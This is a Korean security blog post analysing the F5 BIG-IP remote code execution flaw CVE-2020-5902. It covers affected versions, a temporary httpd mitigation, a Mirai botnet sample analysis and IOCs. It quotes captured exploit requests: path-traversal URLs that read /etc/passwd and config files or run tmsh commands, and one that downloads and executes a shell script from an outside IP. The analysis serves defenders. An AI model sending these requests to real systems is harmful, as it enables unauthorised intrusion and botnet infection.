BIG-IP 원격 코드 실행(RCE) 취약점(CVE-2020-5902)
이 취약점은 2020년 7월에 발견되었고, 발견 당시 해당 취약점을 이용한 많은 공격이 이루어졌음
그리고 취약점 Risk 점수가 10점으로 영향도가 많이 높음
설명
TMUI(Traffic Management User Interface) 취약점을 악용해 인증없이 원격에서 코드를 실행하여 파일 생성/삭제, 서비스 제어, 정보 탈취 등 여러 악성행위를 할 수 있으며, 추가 악성 행위로 내부 네트워크에 악성행위를 확장할 수 있음
F5 BIG-IP 제품은 전세계적으로 많이 사용하는 제품이라 각별한 주의가 필요함
취약점 트래픽
- 탐지 트래픽
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=wget+http%3A%2F%2F23.224.121[.]247%2Fohshit.sh+%3B+chmod+777+ohshit.sh+%[3B+sh+ohshit.sh](<http://3b+sh+ohshit.sh/>)
- 알려진 트래픽
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/tmp
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
취약 버전 및 패치 버전
제품 | 취약 버전 | 패치 버전 |
BIG-IP | 15.0.0-15.1.0 14.1.0-14.1.2 13.1.0-13.1.3 12.1.0-12.1.5 11.6.1-11.6.5 |
15.0.1.4, 15.1.0.4 14.1.2.6 13.1.3.4 12.1.5.2 11.6.5.2 |
임시 조치
LocationMatch 설정을 통해 URL에 ; 또는 hsqldb 문자열이 탐지되는 경우 404 에러페이지로 리다이렉션
# TMOS Shell
> tmsh
# 설정 들어가기
> edit /sys httpd all-properties
# httpd 설정
# include none 부분에 작성
include '
<LocationMatch ";">
Redirect 404 /
</LocationMatch>
<LocationMatch "hsqldb">
Redirect 404 /
</LocationMatch>
'
# 설정 종료
ESC 키
: wq!
# 설정 저장
save /sys config
# 서비스 재시작
restart sys service httpd
탐지 트래픽 분석 내용
트래픽
- /tmui/login.jsp/..; : 취약점을 이용하는 Request
- wget+http%3A%2F%2F23.224.121[.]247%2Fohshit.sh+%3B+chmod+777+ohshit.sh+%[3B+sh+ohshit.s](<http://3b+sh+ohshit.sh/>)
- 23.224.121[.]247에서 ohshit[.]sh 파일 다운로드, 권한 변경 및 실행
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=wget+http%3A%2F%2F23.224.121[.]247%2Fohshit.sh+%3B+chmod+777+ohshit.sh+%[3B+sh+ohshit.sh](<http://3b+sh+ohshit.sh/>)
23.224.121[.]247
- 악성 평판
- 관련 파일
ohshit[.]sh
- wget, curl을 통해 boatnet.* 다수의 악성 파일들 다운로드
boatnet*. 파일
ohshit[.]sh 파일에서 받아지는 모든 파일은 elf(리눅스 실행 파일) 파일임
몇몇 파일은 UPX 패킹되어 있음
- elf
- UPX 패킹
- 언패킹 후 파일 분석
- Botnet String으로 알려진 Self…Fucking…Big 문자열 확인 (Mirai or yakuza Botnet)
- 내부 네트워크 정보 수집을 위해 SSDP(Simple Service Discovery Protocol) 설정 관련 문자열이 확인되고, 정상적인 자산처럼 보이기위해 ST(URN)와 USER-AGENT로 위장 설정으로 추정
- M-SEARCH : Multicast
- HOST : Broadcast / 1900 포트
- MX : 응답시간 1초
- ST : 응답 URN
- USER-AGENT : Google Chrome
- 평판 조회
모든 boatnet.* 파일들은 Mirai Botnet 관련 악성 파일로 분류됨
IOC 정보
구분 | 내용 |
IP | 23.224.121[.]248 |
HASH (SHA256) | ddff877311bf4df026f09ad05a507425d8bcc81c5132b021b10f989c74a60686 |
99cf123963ad52711cfa3aafd243f34e5f031ca31b0e557a150b0511d4e43822 | |
038f396afa2a69cc06ada36133eae7a43d4b277019e88dbc9e9b0b1a757efea3 | |
01932ed966bcb5611ddfdd54cff2250b3c16a8006340d72e847370b99e49ec99 | |
35cafd4e4d4291c26c1821b096fad53cf43e043f91f76cf8dd23833900721065 | |
26d94936c6f35c98aa1c8621dfa8818d54fc5b0b1a897ecc7946c402e7ca3e7d | |
f3773094faecc5462183457078e416c4e7ac51349eb25bfb6de32a75bfdbf026 | |
URL 패턴 | /tmui/login.jsp/..; |
결론
2020년도에 발견된 취약점이고 시간이 많이 지난 상태이지만 현재까지도 해당 취약점을 이용한 공격이 많이 됨
대부분의 파일들이 Anti-Virus, EPP등 보안 솔루션에서 탐지/차단이 되지만, Linux 서버에 보안 솔루션이 설치되어 있지 않다면 상당히 위험함
운영중인 제품의 버전이 낮아서 해당 취약점을 가지고 있는 상태라면
IOC를 통한 사전 차단과 취약점 패치 등 조치를 취해야 함
- 취약점 버전 패치
- IP, URL, HASH 차단 설정
- TMUI httpd 설정 (임시 조치)
- 운영 시스템의 취약점 뉴스, 버전 상태 등 주기적 확인과 보안 패치 운영
'IT 보안' 카테고리의 다른 글
난독화 악성 파워쉘 코드 탐지 및 분석 자료 (6) | 2024.09.23 |
---|---|
OAST(Out-of-Band Application Security Testing) 취약점 스캔 (0) | 2024.09.23 |
Apache Log4j 취약점 (CVE-2021-44228) 분석 자료 (0) | 2024.09.23 |
FBI FLASH CP-000169-TT CP-000165-TT (0) | 2024.09.23 |
Dasan GPON Home Routers Authentication Bypass (CVE-2018-10561, CVE-2018-10562) 분석 자료 (0) | 2024.09.23 |